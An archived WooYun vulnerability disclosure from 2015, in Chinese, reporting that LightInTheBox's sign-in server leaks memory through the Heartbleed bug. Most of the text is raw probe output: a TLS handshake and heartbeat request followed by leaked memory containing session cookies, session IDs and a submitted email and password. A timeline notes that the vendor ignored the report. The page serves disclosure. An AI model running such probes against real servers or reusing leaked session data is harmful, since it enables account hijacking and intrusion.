乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-05: 细节已通知厂商并且等待厂商处理中 2015-07-10: 厂商已经主动忽略漏洞,细节向公众公开
RT
厂商兰亭集势2013年注册的,怎么没人提交漏洞呢、https://ws.lightinthebox.com/zh/signin
Connecting 54.152.193.238...Sending Client Hello...Waiting for Server Hello... ... received message: type = 22, ver = 0302, length = 66 ... received message: type = 22, ver = 0302, length = 3181 ... received message: type = 22, ver = 0302, length = 331 ... received message: type = 22, ver = 0302, length = 4Sending heartbeat request... ... received message: type = 24, ver = 0302, length = 16384Received heartbeat response:[email protected][...r....+..H...9..w.3....f.....".!.9.8...5.....3.2.....E.D...../...A...I.....4.2...#.LHttpRequest..User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36..Content-Type: application/x-www-form-urlencoded; charset=UTF-8..Referer: https://ws.lightinthebox.com/zh/signin..Accept-Encoding: gzip, deflate..Accept-Language: zh-CN,zh;q=0.8..Cookie: ci-currency=CNY; ci-country=44; sid=6E6C45F7-A80F-99CC-8635-800391B41C73; ci-vtimes=a%3A2%3A%7Bs%3A5%3A%22count%22%3Bi%3A1%3Bs%3A4%3A%22time%22%3Bi%3A1436082482%3B%7D; ci-ppv=a%3A2%3A%7Bs%3A5%3A%22count%22%3Bi%3A0%3Bs%3A4%3A%22time%22%3Bi%3A1436082482%3B%7D; ci-cart=0; sid=4gndoe3g9sjmkkqflsd4uubs05; AKAMAI_FEO_TEST=B; VelaTestType=velaOldSearchResult; SRV=A_201504131955; _gat=1; IRF_43=%7Bvisits%3A1%2Cuser%3A%7Btime%3A1436082865829%2Cref%3A%22direct%22%2Cpv%3A4%2Ccap%3A%7B%7D%2Cv%3A%7B%7D%7D%2Cvisit%3A%7Btime%3A1436082865829%2Cref%3A%22direct%22%2Cpv%3A4%2Ccap%3A%7B%7D%2Cv%3A%7B%7D%7D%2Clp%3A%22http%3A//www.lightinthebox.com/%22%2Cdebug%3A0%2Ca%3A1436083302186%2Cd%3A%22lightinthebox.com%22%7D; ci-session=26o2ibvc4uune48t22n798dv82; cookie_test=please_accept_for_session; __cust=AAAAAFWY4TKHtXcJAzFaAg==; ci-language=zh; _ga=GA1.2.2131244393.1436082484P.....Z..referrer=&email=sadasdasd%40sfs.com&password=1qaz2wsx&countries=44T)..ep-alive..Accept-Encoding: gzip,deflate..User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36..Accept: */*....,8(!.39xXG..(G.W...[email protected][...r....+..H...9..w.3....f.....".!.9.8...5.....3.2.....E.D...../...A...I.....4.2...#.LHttpRequest..User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36..Content-Type: application/x-www-form-urlencoded; charset=UTF-8..Referer: https://ws.lightinthebox.com/zh/signin..Accept-Encoding: gzip, deflate..Accept-Language: zh-CN,zh;q=0.8..Cookie: ci-currency=CNY; ci-country=44; sid=6E6C45F7-A80F-99CC-8635-800391B41C73; ci-vtimes=a%3A2%3A%7Bs%3A5%3A%22count%22%3Bi%3A1%3Bs%3A4%3A%22time%22%3Bi%3A1436082482%3B%7D; ci-ppv=a%3A2%3A%7Bs%3A5%3A%22count%22%3Bi%3A0%3Bs%3A4%3A%22time%22%3Bi%3A1436082482%3B%7D; ci-cart=0; sid=4gndoe3g9sjmkkqflsd4uubs05; AKAMAI_FEO_TEST=B; VelaTestType=velaOldSearchResult; SRV=A_201504131955; _gat=1; IRF_43=%7Bvisits%3A1%2Cuser%3A%7Btime%3A1436082865829%2Cref%3A%22direct%22%2Cpv%3A4%2Ccap%3A%7B%7D%2Cv%3A%7B%7D%7D%2Cvisit%3A%7Btime%3A1436082865829%2Cref%3A%22direct%22%2Cpv%3A4%2Ccap%3A%7B%7D%2Cv%3A%7B%7D%7D%2Clp%3A%22http%3A//www.lightinthebox.com/%22%2Cdebug%3A0%2Ca%3A1436083302186%2Cd%3A%22lightinthebox.com%22%7D; ci-session=26o2ibvc4uune48t22n798dv82; cookie_test=please_accept_for_session; __cust=AAAAAFWY4TKHtXcJAzFaAg==; ci-language=zh; _ga=GA1.2.2131244393.1436082484P.....Z..referrer=&email=sadasdasd%40sfs.com&password=1qaz2wsx&countries=44T)..ep-alive..Accept-Encoding: gzip,deflate..User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36..Accept: */*....,8(!.39xXG..(G.W...
~~
危害等级:无影响厂商忽略
忽略时间:2015-07-10 16:12
漏洞Rank:15 (WooYun评价)
暂无